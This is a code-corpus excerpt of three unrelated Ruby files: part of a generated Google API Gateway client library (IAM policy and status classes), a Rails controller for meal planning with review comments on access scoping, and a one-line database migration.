  attr_accessor :audit_configs

  # Associates a list of `members` to a `role`, optionally with a
  # `condition` that determines how and when the bindings are applied.
  # Each binding must contain at least one member.
  # (JSON key: `bindings`)
  # @return [Array<Google::Apis::ApigatewayV1::ApigatewayBinding>]
  attr_accessor :bindings

  # Optimistic-concurrency token that prevents simultaneous policy
  # updates from overwriting each other: systems should take the `etag`
  # returned by `getIamPolicy` and send it back in `setIamPolicy` so the
  # change applies to the same policy version. **Important:** when using
  # IAM Conditions, always include `etag` in `setIamPolicy` calls;
  # omitting it allows a version `3` policy to be overwritten by a
  # version `1` policy, losing all conditions.
  # (JSON key: `etag`)
  # NOTE: Values are automatically base64 encoded/decoded in the client library.
  # @return [String]
  attr_accessor :etag

  # Format of the policy. Valid values are `0`, `1`, and `3`; requests
  # with an invalid value are rejected. Any operation that affects
  # conditional role bindings must specify version `3` (getting a policy
  # that includes a conditional binding; adding, changing, or removing a
  # conditional binding; removing any binding from a policy that has
  # conditions). Policies with no conditions may use any valid version
  # or leave the field unset. See
  # https://cloud.google.com/iam/help/conditions/resource-policies.
  # (JSON key: `version`)
  # @return [Fixnum]
  attr_accessor :version

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[audit_configs bindings etag version].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# Request message for the `SetIamPolicy` method.
class ApigatewaySetIamPolicyRequest
  include Google::Apis::Core::Hashable

  # The IAM policy to apply: a collection of `bindings` associating
  # `members` (users, service accounts, groups, domains) with `roles`,
  # optionally constrained by `conditions`. See
  # https://cloud.google.com/iam/docs/ for a full description of IAM.
  # (JSON key: `policy`)
  # @return [Google::Apis::ApigatewayV1::ApigatewayPolicy]
  attr_accessor :policy

  # OPTIONAL: A FieldMask specifying which fields of the policy to
  # modify; only fields in the mask are changed. If no mask is provided,
  # the default mask `paths: "bindings, etag"` is used.
  # (JSON key: `updateMask`)
  # @return [String]
  attr_accessor :update_mask

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[policy update_mask].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# The `Status` type defines a logical error model suitable for different
# programming environments, including REST APIs and RPC APIs; it is used
# by gRPC (https://github.com/grpc). Each `Status` carries three pieces
# of data: error code, error message, and error details. See the API
# Design Guide: https://cloud.google.com/apis/design/errors.
class ApigatewayStatus
  include Google::Apis::Core::Hashable

  # The status code, which should be an enum value of google.rpc.Code.
  # (JSON key: `code`)
  # @return [Fixnum]
  attr_accessor :code

  # Messages carrying the error details; a common set of message types
  # is available for APIs to use. (JSON key: `details`)
  # @return [Array<Hash<String,Object>>]
  attr_accessor :details

  # Developer-facing error message, in English. User-facing messages
  # should be localized and sent in google.rpc.Status.details, or
  # localized by the client. (JSON key: `message`)
  # @return [String]
  attr_accessor :message

  def initialize(**args)
    update!(**args)
  end

  # Assign each recognized keyword argument to its matching instance
  # variable; keys that are absent leave the current value untouched.
  def update!(**args)
    %i[code details message].each do |prop|
      instance_variable_set(:"@#{prop}", args[prop]) if args.key?(prop)
    end
  end
end
# Request message for the `TestIamPermissions` method.
class ApigatewayTestIamPermissionsRequest
  include Google::Apis::Core::Hashable

  # The set of permissions to check for the `resource`. Wildcards (such
  # as '*' or 'storage.*') are not allowed. See
  # https://cloud.google.com/iam/docs/overview#permissions.
  # (JSON key: `permissions`)
  # @return [Array<String>]
  attr_accessor :permissions

  def initialize(**args)
    update!(**args)
  end

  # Assign the recognized keyword argument to its instance variable; an
  # absent key leaves the current value untouched.
  def update!(**args)
    @permissions = args[:permissions] if args.key?(:permissions)
  end
end
# Response message for the `TestIamPermissions` method.
class ApigatewayTestIamPermissionsResponse
  include Google::Apis::Core::Hashable

  # The subset of `TestPermissionsRequest.permissions` that the caller
  # is allowed. (JSON key: `permissions`)
  # @return [Array<String>]
  attr_accessor :permissions

  def initialize(**args)
    update!(**args)
  end

  # Assign the recognized keyword argument to its instance variable; an
  # absent key leaves the current value untouched.
  def update!(**args)
    @permissions = args[:permissions] if args.key?(:permissions)
  end
end
# A generic empty message, reusable to avoid defining duplicated empty
# messages in APIs — typically used as the request or response type of
# an API method, e.g.:
#   service Foo ` rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); `
# The JSON representation of `Empty` is the empty JSON object ````.
class Empty
  include Google::Apis::Core::Hashable

  def initialize(**args)
    update!(**args)
  end

  # No properties are defined for this message; any supplied keys are ignored.
  def update!(**args); end
end
end
end
end
| 45.563115 | 106 | 0.639191 |
class MealsController < ApplicationController
  # Creates a meal owned by the signed-in user, then returns to the planner.
  # The original always redirected even when validations failed; now a
  # failed save redirects with an explanatory notice.
  def create
    meal = current_user.meals.create(meal_params)
    if meal.persisted?
      redirect_to meals_path
    else
      redirect_to meals_path, notice: "Meal could not be created."
    end
  end

  # Updates one of the signed-in user's meals.
  # Fixes two defects in the original:
  # * the meal was looked up via the unscoped `Meal.find`, letting any
  #   user update any other user's meal — now scoped through
  #   `current_user.meals`, consistent with #destroy;
  # * the failure branch was empty, so no response was rendered — now it
  #   redirects with a notice, consistent with #destroy.
  def update
    if current_user.meals.find(params[:id]).update(meal_params)
      redirect_to meals_path
    else
      redirect_to meals_path, notice: "Meal could not be updated."
    end
  end

  # Lists meals scheduled inside the current two-week planning window and
  # loads them into the planner for display.
  # NOTE(review): this query is not scoped to current_user, unlike
  # #update/#destroy — confirm whether meals are meant to be shared.
  def index
    @planner = TwoWeekPlanner.new
    @meals = Meal
      .where("scheduled_at BETWEEN ? AND ?",
             @planner.weeks.first.first.beginning_of_day,
             @planner.weeks.last.last.end_of_day)
      .order("scheduled_at desc")
    @planner.add_meals(@meals)
    respond_to do |format|
      format.html
    end
  end

  # Removes one of the signed-in user's meals.
  def destroy
    if current_user.meals.find(params[:id]).destroy
      redirect_to meals_path, notice: "Meal destroyed."
    else
      redirect_to meals_path, notice: "Meal could not be destroyed."
    end
  end

  private

  # Strong parameters: only the recipe and the scheduled time may be
  # mass-assigned.
  def meal_params
    params.require(:meal).permit :recipe_id, :scheduled_at
  end
end
| 20.883721 | 68 | 0.688196 |
# Adds a free-form string `status` column to the `complaints` table.
# Reversible: `change` lets Rails derive the matching `remove_column`.
class AddStatusToComplaints < ActiveRecord::Migration[5.0]
  def change
    add_column :complaints, :status, :string
  end
end
| 21.166667 | 58 | 0.755906 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.